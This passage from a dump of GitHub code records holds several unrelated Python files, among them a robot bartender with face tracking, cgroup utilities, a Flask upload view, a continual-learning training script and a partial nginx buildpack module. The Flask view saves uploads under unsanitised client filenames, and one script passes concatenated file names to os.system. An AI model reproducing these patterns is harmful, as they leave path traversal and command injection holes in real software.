But including the screen shots\r\nlin_reg.linear_regression('WinterRain','Price', \"simple linear regression for WinterRain and price\", \"WinterRain\", \"Price\")\r\nlin_reg.linear_regression('HarvestRain','Price', \"simple linear regression for HarvestRain and price\", \"HarvestRain\", \"Price\")\r\nlin_reg.linear_regression('Age','Price', \"simple linear regression for Age and Price\", \"Age\", \"Price\")\r\nlin_reg.linear_regression('Year','Price', \"simple linear regression for Year and Price\", \"Year\", \"Price\")\r\n\r\n\r\n\r\n","repo_name":"amithmahakala423/Excel_Project","sub_path":"wine_linearregression.py","file_name":"wine_linearregression.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14375207916","text":"import numpy as np\nimport cv2 \nimport face_recognition\nfrom adafruit_servokit import ServoKit\nimport sys\nimport time\n\n\nclass robot:\n    # initialize servos and variables\n    kit = ServoKit(channels=16)\n\n    servo_base = kit.servo[0]\n    servo_base_angle = 0\n    servo_arm = kit.servo[1]\n    servo_hand = kit.servo[2]\n    hand_open = False\n\n    drinks={'cola':60,'fanta':80,'ron':100,'ginebra':130}\n\n\n    marge = 20\n    def __init__(self):\n        self.servo_base.angle=0\n        self.servo_arm.angle=0\n        self.servo_hand.angle=0\n    # position of the face relative to the camera\n    def need_mov(self,w,locations):\n        x = locations[3]+(locations[1]-locations[3])/2\n        if x > w/2 +self.marge:\n            return 'right'\n        elif x< w/2 -self.marge:\n            return 'left'\n        else:\n            return False\n\n    # clamp the base movement and store the current angle\n    def move_base(self,angle):\n        if angle >=180:\n            self.servo_base_angle = 180\n            self.servo_base.angle = self.servo_base_angle\n        elif angle <=0:\n            self.servo_base_angle = 0\n            self.servo_base.angle = self.servo_base_angle\n        else:\n            self.servo_base_angle = angle\n            self.servo_base.angle = self.servo_base_angle\n    \n    # extend the arm\n    def open_arm(self):\n        self.servo_arm.angle = 120\n\n    # retract the arm\n    def close_arm(self):\n        self.servo_arm.angle = 0\n\n    # open the hand\n    def open_hand(self):\n        self.servo_hand.angle = 0\n        self.hand_open = True\n\n    # close the hand\n    def close_hand(self):\n        self.servo_hand.angle = 85\n        self.hand_open = False\n\n    # move the base until it is centered on the face\n    def move_base_facedet(self, face_state):\n        time.sleep(2)\n        if face_state == 'left':\n            if (self.servo_base_angle + self.marge) <= 180:\n                self.servo_base_angle += self.marge\n            else:\n                self.servo_base_angle = 180\n            self.servo_base.angle = self.servo_base_angle\n        elif face_state == 'right':\n            if (self.servo_base_angle - self.marge) >= 0:\n                self.servo_base_angle -= self.marge\n            else:\n                self.servo_base_angle = 0\n            self.servo_base.angle = self.servo_base_angle\n\n\n    # face detection and tracking movement\n    def detect_faces(self):\n        cap = cv2.VideoCapture(0)\n        if not cap.isOpened():\n            print(\"Cannot open camera\")\n            exit()\n        while True:\n            # Capture frames\n            ret, frame = cap.read()\n            height, width, _ = frame.shape\n            if not ret:\n                print(\"Can't receive frame. 
Exiting ...\")\n                break\n            frame = cv2.flip(frame,1)\n            frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n            face_locations = face_recognition.face_locations(frame_rgb)\n\n            if face_locations:\n                f_state = self.need_mov(width,face_locations[0])\n                self.move_base_facedet(f_state)\n                # draw a rectangle around the faces\n                top, right, bottom, left = face_locations[0]\n                cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n                # draw the name below\n                # could use a face database here\n                cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n                font = cv2.FONT_HERSHEY_DUPLEX\n                cv2.putText(frame, 'Person', (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n            cv2.imshow('image', frame)\n            if cv2.waitKey(1) == ord('x'):\n                break\n        # When everything done, release the capture\n        cap.release()\n        cv2.destroyAllWindows()\n\n    def serve_order(self,ord_str):\n        # grab an empty glass\n        self.move_base(45)\n        time.sleep(2)\n        self.open_arm()\n        time.sleep(2)\n        self.close_hand()\n        time.sleep(2)\n        self.close_arm()\n        time.sleep(2)\n        # pour each ordered drink - predefined angles\n        for order in ord_str.split(','):\n            self.move_base(self.drinks[order])\n            time.sleep(2)\n            self.open_arm()\n            time.sleep(2)\n            self.close_arm()\n            time.sleep(2)\n        self.move_base(0)\n        time.sleep(2)\n        self.open_arm()\n        time.sleep(2)\n        self.detect_faces()\n\nrob = robot()\ntime.sleep(2)\nrob.serve_order(sys.argv[1])\n","repo_name":"OriolFeliu/Guabar","sub_path":"Code/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16805224795","text":"import logging, os\nimport error, utils\n\n# Global cache of all the cgroups and their associated mount points.\ncached_mounts = {}\n\n\ndef mount_point(subsystem):\n    \"\"\"Get mount point for the cgroup hierarchy handling a particular subsystem.\n    \"\"\"\n    if subsystem not in cached_mounts:\n        cached_mounts[subsystem] = ''\n        for mounts in open('/proc/mounts').readlines():\n            name, mount_pt, fs, options, junk = mounts.split(None, 4)\n            if (fs == 'cgroup' and subsystem in options.split(',') or\n                fs == 'cpuset' == subsystem):\n                cached_mounts[subsystem] = mount_pt\n                break\n\n    if cached_mounts[subsystem] == '':\n        # Error out if no mount_point found.\n        raise error.Error('Could not find an associated mount point for '\n                          'subsystem: %s' % subsystem)\n\n    return cached_mounts[subsystem]\n\n\ndef my_container():\n    \"\"\"Get current task's cgroup names, across all cgroup hierarchies.\"\"\"\n    container = {} # maps cgroup-subsystems to mount-relative cgroup paths\n    filename = '/proc/self/cgroup'\n    if os.path.exists(filename):\n        for hierarchy in open(filename).readlines():\n            # eg 'number:oom,blockio,net,cpuacct,cpu,cpuset:/sys'\n            junknum, subsystems, cgroup_name = hierarchy.split(':')\n            cgroup_name = cgroup_name[1:-1] # strip leading / and newline\n            for subsystem in subsystems.split(','):\n                container[subsystem] = cgroup_name\n    else:\n        filename = '/proc/self/cpuset'\n        cgroup_name = utils.read_one_line(filename)[1:] # strip leading /\n        container['cpuset'] = cgroup_name\n    return container\n\n\ndef root_cgroup(subsystem):\n    \"\"\"Get an accessor to the root cgroup, with no subsystem.\"\"\"\n    return cgroup(subsystem, '')\n\n\ndef cgroup(subsystem, name):\n    \"\"\"Get a cgroup accessor for the subsystem for cgroup name.\"\"\"\n    path = os.path.join(mount_point(subsystem), name)\n    return cgroup_accessor(subsystem, path)\n\n\ndef subsystem_prefix(subsystem):\n    
\"\"\"Get qualifier for subsystem's attribute names.\"\"\"\n filename = os.path.join(mount_point('cpuset'), 'cpus')\n if subsystem == 'cpuset' and os.path.exists(filename):\n return '' # old non-cgroup style\n return subsystem + '.'\n\n\nclass cgroup_accessor(object):\n \"\"\"An accessor for data related to a cgroup.\n\n This class controls getting and putting attributes, and cgroup creation and\n destruction. This is the recommended abstraction for modifying cgroup\n settings.\n \"\"\"\n\n def __init__(self, subsystem, path):\n mount = mount_point(subsystem)\n self.subsystem = subsystem\n self.path = path\n self.name = path[len(mount)+1:]\n self.cpuset_hierarchy = mount == mount_point('cpuset')\n self.subsystem_prefix = subsystem_prefix(subsystem)\n\n\n def parent(self):\n \"\"\"Get the parent of this cgroup.\"\"\"\n return cgroup_accessor(self.subsystem, os.path.dirname(self.path))\n\n\n def child(self, name):\n \"\"\"Get the child of this cgroup that has the requested name.\"\"\"\n return cgroup_accessor(self.subsystem, os.path.join(self.path, name))\n\n\n def _attr_file(self, attr, prefix):\n \"\"\"Get the name of the file that stores the given attribute.\"\"\"\n if prefix == 'default':\n prefix = self.subsystem_prefix\n return os.path.join(self.path, prefix+attr)\n\n\n def get_attr(self, attr, prefix='default'):\n \"\"\"Get the value of a given cgorup attribute.\"\"\"\n filename = self._attr_file(attr, prefix)\n return [value.rstrip() for value in open(filename).readlines()]\n\n\n def put_attr(self, attr, values, prefix='default'):\n \"\"\"Set the value of a given cgorup attribute.\"\"\"\n filename = self._attr_file(attr, prefix)\n for value in values:\n utils.write_one_line(filename, value)\n\n\n def get_tasks(self):\n \"\"\"Get the value of the 'tasks' cgorup attribute.\"\"\"\n return self.get_attr('tasks', '')\n\n\n def put_tasks(self, tasks):\n \"\"\"Set the value of the 'tasks' cgroup attribute.\n\n This requires special handling because only one task can be added\n through the file interface at a time.\n\n Raises an exception if the task cannot be moved.\n \"\"\"\n for task in tasks:\n try:\n self.put_attr('tasks', [task], '')\n except Exception:\n if utils.pid_is_alive(task):\n raise # task exists but couldn't move it\n # task is gone or zombie so ignore this exception\n # also removes tasks from their current cgroup in same hierarchy\n logging.debug('Running pid %s in cgroup %s', ','.join(tasks), self.path)\n\n\n def move_my_task_here(self):\n \"\"\"Move the current task to this cgroup.\n\n Raises an exception if the task cannot be moved.\n \"\"\"\n self.put_tasks([str(os.getpid())])\n\n\n def release(self):\n \"\"\"Destroy this cgroup.\n\n Destroy the cgroup and transfers all surviving tasks to this cgroup's\n parent.\n \"\"\"\n if os.path.exists(self.path):\n # Transfer any survivor tasks (e.g. 
me) to parent\n            self.parent().put_tasks(self.get_tasks())\n\n        # remove the now-empty outermost cgroup of this subtree\n        os.rmdir(self.path)\n        logging.debug('Deleted cgroup %s', self.path)\n","repo_name":"google/blkcgroup","sub_path":"cgroup.py","file_name":"cgroup.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"41682799406","text":"import sys\nfrom collections import defaultdict\nsys.setrecursionlimit(10**9)\nsys.stdin = open(\"9_input.txt\",\"r\")\n\ndef dfs(start) :\n    cnt = 0\n    for next in path[start] :\n        if A[next] == '1' :\n            cnt += 1\n        else :\n            if not visited[next] :\n                visited[next] = True\n                cnt += dfs(next)\n    return cnt\n    \nn = int(input())\nA = ' ' + sys.stdin.readline().strip() # string holding the indoor/outdoor info of each vertex; a single space (' ') is prepended so the index matches the vertex number\npath = [[] for _ in range(n+1)] \nvisited = [False] * (n+1)\nans = 0\n\nfor _ in range(n-1) :\n    start, end = map(int, sys.stdin.readline().strip().split())\n    path[start].append(end)\n    path[end].append(start)\n\nfor i in range(1, n+1) :\n    if A[i] == '1' :\n        for j in path[i] :\n            if A[j] == '1' :\n                ans += 1\n    else :\n        if not visited[i] :\n            visited[i] = True\n            cnt = dfs(i)\n            ans += cnt *(cnt-1) # picking 2 out of n where order matters: nP2 = n(n-1)\n\nprint(ans)\n\n","repo_name":"choidabom/week03_Team2","sub_path":"21606/21606_mgs.py","file_name":"21606_mgs.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70443776465","text":"from flask import Blueprint, render_template, request\nfrom functions import *\nimport logging\n\nlogging.basicConfig(filename=\"./basic.log\", level=logging.INFO)\n\n\nloader_blueprint = Blueprint('loader_blueprint', __name__, template_folder=\"templates\")\n\n@loader_blueprint.route(\"/post\", methods=['GET'])\ndef loader_page():\n    return render_template(\"post_form.html\")\n\n@loader_blueprint.route(\"/post\", methods=['POST'])\ndef page_upload():\n    \"\"\" This view processes the form, extracts the file from the request and shows its name\"\"\"\n\n    # Get the picture object and the text from the form\n    picture = request.files.get(\"picture\", None)\n    content = request.form.get(\"content\", '')\n\n    filename = picture.filename # Get the name of the uploaded file\n\n    ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n    extension = filename.split(\".\")[-1] # Get the file extension\n    if extension in ALLOWED_EXTENSIONS: # If the file extension is in the whitelist\n        # Save the picture under its original name into the uploads folder\n        picture.save(f\"./uploads/{filename}\")\n    else:\n        logging.info(\"Loading file - no picture\")\n        return f\"The file type {extension} is not supported\"\n    pict = f\"/uploads/{filename}\"\n    save_json(pict, content) # Write the JSON file\n    return render_template(\"post_uploaded.html\", picture=pict, content=content)\n","repo_name":"artemskav/PyHW12","sub_path":"loader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12245553667","text":"import torch\nimport random\nimport argparse\nfrom dataloaders import loader\nimport learners\nimport dataloaders\nimport numpy as np\nfrom dataloaders.utils import *\nfrom torch.utils.data import DataLoader\n\ndef run(args):\n    seed = args.seed\n    random.seed(seed)\n    np.random.seed(seed)\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed(seed)\n    
torch.backends.cudnn.deterministic=True\n\n    if args.dataset == 'CIFAR10':\n        Dataset = dataloaders.CIFAR10\n        num_classes = 10\n    elif args.dataset == 'CIFAR100':\n        Dataset = dataloaders.CIFAR100\n        num_classes = 100\n    else:\n        print('Dataset not selected.')\n        exit()\n\n    # load tasks\n    class_order = np.arange(num_classes).tolist()\n    class_order_logits = np.arange(num_classes).tolist()\n    if seed > 0 and args.rand_split:\n        random.seed(seed)\n        random.shuffle(class_order)\n\n    tasks = []\n    tasks_logits = []\n    p = 0\n    first_split_size = 5\n    other_split_size = 5\n\n    while p < num_classes:\n        inc = other_split_size if p > 0 else first_split_size\n        tasks.append(class_order[p:p+inc])\n        tasks_logits.append(class_order_logits[p:p+inc])\n        p += inc\n    num_tasks = len(tasks)\n    task_names = [str(i+1) for i in range(num_tasks)]\n\n    # datasets and dataloaders\n    train_transform = dataloaders.utils.get_transform(dataset=args.dataset)\n    test_transform = dataloaders.utils.get_transform(dataset=args.dataset)\n    \n    train_dataset = Dataset(args.dataroot, train=True, label=True, num_label_data=args.labeled_samples, class_type=args.class_type, transform=train_transform, download=True)\n\n    train_dataset_ul = Dataset(args.dataroot, train=True, label=False, num_label_data=args.labeled_samples, class_type=args.class_type, transform=train_transform, download=True)\n\n    test_dataset = Dataset(args.dataroot, train=False, class_type=args.class_type, transform=test_transform, download=True)\n\n    # in case tasks reset...\n    tasks = train_dataset.tasks\n    max_task = len(tasks)\n\n    learner_config = {'num_classes': num_classes,\n                      'model_type' : args.model_type,\n                      'model_name' : args.model_name,\n                      'epoch' : args.epoch,\n                      'lr' : args.lr,\n                      'momentum' : args.momentum,\n                      'weight_decay' : args.weight_decay,\n                      'num_task' : max_task,\n                      'threshold' : args.threshold,\n                      'memory' : args.memory,\n                      'device' : args.device,\n                      'logdir' : args.log_dir + '/logs/sscl_'\n                      }\n    learner = learners.__dict__[args.learner_type].__dict__[args.learner_name](learner_config)\n\n\n    for i in range(max_task):\n        train_name = task_names[i]\n        print('======================', train_name, '=======================')\n\n        # load dataset for task\n        task = tasks_logits[i]\n        prev = sorted(set([k for task in tasks_logits[:i] for k in task]))\n\n        train_dataset.load_dataset(prev, i, train=True)\n        train_dataset_ul.load_dataset(prev, i, train=True)\n        out_dim_add = len(task)\n\n        # load dataloader\n        train_loader_l = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False, num_workers=args.workers)\n        train_loader_ul = DataLoader(train_dataset_ul, batch_size=args.ul_batch_size, shuffle=True, drop_last=False, num_workers=args.workers)\n\n        test_dataset.load_dataset(prev, i, train=False)\n        test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, drop_last=False, num_workers=args.workers)\n\n        # add valid class for classifier\n        model_save_dir = args.log_dir + '/models/task-'+task_names[i]+'/'\n        if not os.path.exists(model_save_dir): os.makedirs(model_save_dir)\n\n        learner.add_valid_output_dim(out_dim_add)\n        learner.learn_batch(train_loader_l, train_loader_ul, model_save_dir)\n\n        learner.validatioin(test_loader)\n\n    learner.logger.writer('Total Training Accuracy', learner.total_train_acc.avg, 1)\n    learner.logger.writer('Total Training OOD Accuracy', learner.total_ood_acc.avg, 1)\n    learner.logger.writer('Total Validation Accuracy', learner.total_val_acc.avg, 1)\n\nif __name__ == '__main__':\n    parser = 
argparse.ArgumentParser(description='Semi-Supervised Continual Learning')\n\n    # Standard Args\n    parser.add_argument(\"--seed\", type=int, default=0, help='Set seed (default=0)')\n    parser.add_argument(\"--device\", type=int, default=0, help='Set gpu id (default=0)')\n    parser.add_argument(\"--dataset\", type=str, default='CIFAR100', help=\"CIFAR10|CIFAR100\")\n    parser.add_argument(\"--log_dir\", type=str, default=\"outputs\", help=\"Save experiments results in dir for future plotting!\")\n    parser.add_argument(\"--dataroot\", type=str, default='data', help=\"The root folder of dataset or downloaded data\")\n    parser.add_argument(\"--workers\", type=int, default=4, help=\"#Thread for dataloader\")\n    parser.add_argument('--model_type', type=str, default='tiny_model', help=\"The type (filename) of backbone network\")\n    parser.add_argument('--model_name', type=str, default='Reduced_ResNet18', help=\"Reduced_ResNet18|mobilenet_v2\")\n    parser.add_argument('--epoch', type=int, default=10)\n    parser.add_argument('--lr', type=float, default=0.1, help=\"Learning rate\")\n    parser.add_argument('--momentum', type=float, default=0.9)\n    parser.add_argument('--weight_decay', type=float, default=5e-4)\n    parser.add_argument('--threshold', type=float, default=0.5)\n    parser.add_argument('--memory', type=int, default=400, help=\"size of memory for replay\")\n\n    # SSCL Args\n    parser.add_argument('--class_type', type=str, default='super', help=\"vanilla|super\")\n    parser.add_argument('--rand_split', default=False, action='store_true', help=\"Randomize the classes in splits\")\n    parser.add_argument('--batch_size', type=int, default=16)\n    parser.add_argument('--learner_type', type=str, default='tiny_learner', help=\"The type (filename) of learner\")\n    parser.add_argument('--learner_name', type=str, default='SSCL', help=\"The class name of learner\")\n    parser.add_argument('--ul_batch_size', type=int, default=32)\n    parser.add_argument('--labeled_samples', type=int, default=500, help='Number of labeled samples each task in ssl')\n    parser.add_argument('--unlabeled_task_samples', type=int, default=-1, help='Number of unlabeled samples in each task in ssl')\n\n    args = parser.parse_args()\n\n    run(args)","repo_name":"hopo55/SSCL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11819960777","text":"def isWordChain(words):\n\tif len(words)<2:\n\t\treturn True\n\tprevious_word = words[0]\n\tfor i in range(1,len(words)):\n\t\tif is_levelshtein_1(previous_word, words[i]):\n\t\t\tprevious_word = words[i]\n\t\telse:\n\t\t\treturn False\n\treturn True\n\ndef is_levelshtein_1(a,b):\n\tlen_diff = len(a) - len(b)\n\tif len_diff > 1 or len_diff < -1:\n\t\treturn False\n\t\n\t#case 1\n\tif len_diff == 0:\n\t\tchange_count = 0\n\t\tfor i in range(len(a)):\n\t\t\tif a[i] == b[i]:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tchange_count = change_count+1\n\t\treturn change_count == 1\n\t\t\n\t#case 2\n\tif len_diff == 1:\n\t\tlonger = a\n\t\tshorter = b\n\telse:\n\t\tlonger = b\n\t\tshorter = a\n\tremove_char_found = 0\n\tfor i in range(len(shorter)):\n\t\tif shorter[i] == longer[i+remove_char_found]:\n\t\t\tcontinue\n\t\telse:\n\t\t\t#skip one char of the longer word; this position must then match\n\t\t\tremove_char_found = remove_char_found+1\n\t\t\tif remove_char_found > 1 or shorter[i] != longer[i+remove_char_found]:\n\t\t\t\treturn False\n\treturn remove_char_found 
<2\n","repo_name":"ASHISH-KUMAR-PANDEY/python","sub_path":"word_challenge.py","file_name":"word_challenge.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41764467662","text":"#!/usr/bin/env python\n# Thomas Reerink\n#\n# This script converts a component json file produced by genecec including the preferences\n# into a flat json without the component structure (ifs, nemo, lpjg & tm5) such that it can be\n# read with: checkvars -v --asciionly --drq flat-json-file.json --output request-overview\n#\n# Note that when a flat json file is given (instead of a component json file) the produced json\n# file will be just equal to the input flat json file.\n#\n# Run this script without arguments for examples of how to call this script.\n#\n# This script is part of the subpackage genecec (GENerate EC-Earth Control output files)\n# which is part of ece2cmor3.\n\n\nimport sys\nimport os\nimport json\n\nerror_message = '\\n \\033[91m' + 'Error:' + '\\033[0m' # Red error message\nwarning_message = '\\n \\033[93m' + 'Warning:' + '\\033[0m' # Yellow warning message\n\n# Main program\ndef main():\n\n    if len(sys.argv) == 2:\n\n        input_json_file = sys.argv[1] # Reading the data request file name from the argument line\n        if os.path.isfile(input_json_file) == False: # Checking if the data request file exists\n            print(error_message, ' The data request file ', input_json_file, ' does not exist.\\n')\n            sys.exit()\n\n        with open(input_json_file) as json_file:\n            data_request = json.load(json_file)\n        json_file.close()\n\n        output_json_file = os.path.basename(input_json_file).replace('.json','-flat.json')\n\n        print('\\n Running {:} with:\\n {:} {:}\\n'.format(os.path.basename(sys.argv[0]), os.path.basename(sys.argv[0]), sys.argv[1]))\n\n        # Check whether the input json file is a component json or a flat json file:\n        if \"ifs\" in data_request:\n            ifs_request = data_request[\"ifs\"]\n            nemo_request = data_request[\"nemo\"]\n            lpjg_request = data_request[\"lpjg\"]\n            tm5_request = data_request[\"tm5\"]\n\n\n            # Determine whether a same table is present in the nemo dictionary as in the ifs dictionary:\n            for x in nemo_request:\n                if x in ifs_request:\n                    for i in range(0, len(nemo_request[x])):\n                        ifs_request[x].append(nemo_request[x][i])\n                else:\n                    ifs_request.update({x: nemo_request[x]})\n\n            # Determine whether a same table is present in the lpjg dictionary as in the ifs dictionary:\n            for x in lpjg_request:\n                if x in ifs_request:\n                    for i in range(0, len(lpjg_request[x])):\n                        ifs_request[x].append(lpjg_request[x][i])\n                else:\n                    ifs_request.update({x: lpjg_request[x]})\n\n            # Determine whether a same table is present in the tm5 dictionary as in the ifs dictionary:\n            for x in tm5_request:\n                if x in ifs_request:\n                    for i in range(0, len(tm5_request[x])):\n                        ifs_request[x].append(tm5_request[x][i])\n                else:\n                    ifs_request.update({x: tm5_request[x]})\n\n            with open(output_json_file, 'w') as outfile:\n                json.dump(ifs_request, outfile, sort_keys=True, indent=4)\n            outfile.close()\n\n        else:\n            print(warning_message, 'The file', sys.argv[1], 'is a flat json already, therefore it is not converted but copied instead.')\n            command = 'rsync -a ' + input_json_file + ' ' + output_json_file\n            os.system(command)\n\n        command = 'sed -i \"s/\\s*$//g\"' + ' ' + output_json_file\n        os.system(command)\n\n        print(' which produced the file:')\n        print(' ', output_json_file)\n        print()\n\n    else:\n        print()\n        print(' This script requires one argument, a json file, e.g.:')\n        
print(' ', os.path.basename(sys.argv[0]), '~/cmorize/control-output-files/output-control-files-v196/cmip6/CMIP/EC-EARTH-AOGCM/cmip6-experiment-CMIP-historical/cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM.json')\n print(' ', os.path.basename(sys.argv[0]), '../resources/miscellaneous-data-requests/lamaclima/lamaclima-data-request-varlist-EC-EARTH-Veg.json')\n print(' ', os.path.basename(sys.argv[0]), '~/cmorize/control-output-files/output-control-files-v196/cmip6/AerChemMIP/cmip6-experiment-AerChemMIP-hist-1950HC/cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem.json')\n print()\n\nif __name__ == \"__main__\":\n main()\n\n\n# Validation:\n#\n# non_flat_json=~/cmorize/control-output-files/output-control-files-v196/cmip6/CMIP/EC-EARTH-AOGCM/cmip6-experiment-CMIP-historical/cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM.json\n# flat_json=cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM-flat.json\n# non_flat_json=../resources/miscellaneous-data-requests/lamaclima/lamaclima-data-request-varlist-EC-EARTH-Veg.json\n# flat_json=lamaclima-data-request-varlist-EC-EARTH-Veg-flat.json\n# non_flat_json=~/cmorize/control-output-files/output-control-files-v196/cmip6/AerChemMIP/cmip6-experiment-AerChemMIP-hist-1950HC/cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem.json\n# flat_json=cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem-flat.json\n# \n# more ${flat_json} | grep -v -e '}' -e '{' -e ']' -e '\\[' | sort > sorted-flat.txt\n# more ${non_flat_json} | grep -v -e '}' -e '{' -e ']' -e '\\[' | sort > sorted-non-flat.txt\n# wc sorted-non-flat.txt; wc sorted-flat.txt\n# diff -b sorted-non-flat.txt sorted-flat.txt\n# \n# rm -f cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM-flat.json lamaclima-data-request-varlist-EC-EARTH-Veg-flat.json cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem-flat.json sorted-flat.txt sorted-non-flat.txt\n","repo_name":"EC-Earth/ece2cmor3","sub_path":"ece2cmor3/scripts/convert_component_to_flat_json.py","file_name":"convert_component_to_flat_json.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"38550108715","text":"import crypt\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nfrom dataclasses import dataclass\n\nfrom buildpack import util\nfrom buildpack.core import runtime, security\nfrom jinja2 import Template\nfrom lib.m2ee.version import MXVersion\nfrom lib.m2ee.util import strtobool\n\nALLOWED_HEADERS = {\n \"X-Frame-Options\": r\"(?i)(^allow-from https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$|^deny$|^sameorigin$)\", # noqa: line-too-long\n \"Referrer-Policy\": r\"(?i)(^no-referrer$|^no-referrer-when-downgrade$|^origin|origin-when-cross-origin$|^same-origin|strict-origin$|^strict-origin-when-cross-origin$|^unsafe-url$)\", # noqa: line-too-long\n \"Access-Control-Allow-Origin\": r\"(?i)(^\\*$|^null$|^https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$)\", # noqa: line-too-long\n \"X-Content-Type-Options\": r\"(?i)(^nosniff$)\",\n \"Content-Security-Policy\": r\"[a-zA-Z0-9:;/''\\\"\\*_\\- \\.\\n?=%&+]+\",\n \"Strict-Transport-Security\": r\"(?i)(^max-age=[0-9]*$|^max-age=[0-9]*; includeSubDomains$|^max-age=[0-9]*; preload$)\", # noqa: line-too-long\n 
\"X-Permitted-Cross-Domain-Policies\": r\"(?i)(^all$|^none$|^master-only$|^by-content-type$|^by-ftp-filename$)\", # noqa: line-too-long\n \"X-XSS-Protection\": r\"(?i)(^0$|^1$|^1; mode=block$|^1; report=https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$)\", # noqa: line-too-long\n}\n\nCONFIG_FILE = \"nginx/conf/nginx.conf\"\nPROXY_FILE = \"nginx/conf/proxy_params\"\n\nDEFAULT_REQUEST_HANDLER_PATHS = [\n \"/p/\",\n \"/rest-doc/\",\n \"/link/\",\n \"/api-doc/\",\n \"/odata-doc/\",\n \"/ws-doc/\",\n]\nFILE_HANDLER_PATH = \"/file\"\nDEFAULT_LOCATION_PATHS = [\"/\", FILE_HANDLER_PATH]\nMXADMIN_PATH = \"/_mxadmin/\"\nCLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX = \"/client-cert-check-internal\"\nRESERVED_PATH_PREFIXES = [MXADMIN_PATH, CLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX]\n\n# Fix for Chrome SameSite enforcement (from Chrome 80 onwards)\n# Runtime will set this cookie\n# in runtime versions >= SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION\ndef _is_samesite_cookie_workaround_enabled(mx_version):\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY = \"SAMESITE_COOKIE_PRE_MX812\"\n SAMESITE_COOKIE_WORKAROUND_DEFAULT = False\n SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION = \"8.12\"\n\n try:\n return strtobool(\n os.environ.get(\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY,\n str(SAMESITE_COOKIE_WORKAROUND_DEFAULT),\n )\n ) and mx_version < MXVersion(SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION)\n except (ValueError, AttributeError):\n logging.warning(\n \"Invalid value for [%s], disabling SameSite cookie workaround\",\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY,\n )\n return False\n\n\ndef _is_custom_nginx():\n return bool(\"NGINX_CUSTOM_BIN_PATH\" in os.environ)\n\n\ndef stage(buildpack_path, build_path, cache_path):\n logging.debug(\"Staging nginx...\")\n shutil.copytree(\n os.path.join(buildpack_path, \"etc/nginx\"),\n os.path.join(build_path, \"nginx\"),\n )\n\n if not _is_custom_nginx():\n logging.debug(\"Downloading nginx...\")\n util.resolve_dependency(\n \"nginx\",\n os.path.join(build_path, \"nginx\"),\n buildpack_dir=buildpack_path,\n cache_dir=cache_path,\n )\n else:\n logging.debug(\"Custom nginx path provided, nginx will not be downloaded\")\n\n\ndef update_config():\n samesite_cookie_workaround_enabled = _is_samesite_cookie_workaround_enabled(\n runtime.get_runtime_version()\n )\n if samesite_cookie_workaround_enabled:\n logging.info(\"SameSite cookie workaround is enabled\")\n\n # Populating nginx config template\n output_path = os.path.abspath(CONFIG_FILE)\n template_path = os.path.abspath(f\"{CONFIG_FILE}.j2\")\n\n with open(template_path, \"r\") as file_:\n template = Template(file_.read(), trim_blocks=True, lstrip_blocks=True)\n rendered = template.render(\n samesite_cookie_workaround_enabled=samesite_cookie_workaround_enabled,\n locations=_get_locations(),\n default_headers=_get_http_headers(),\n 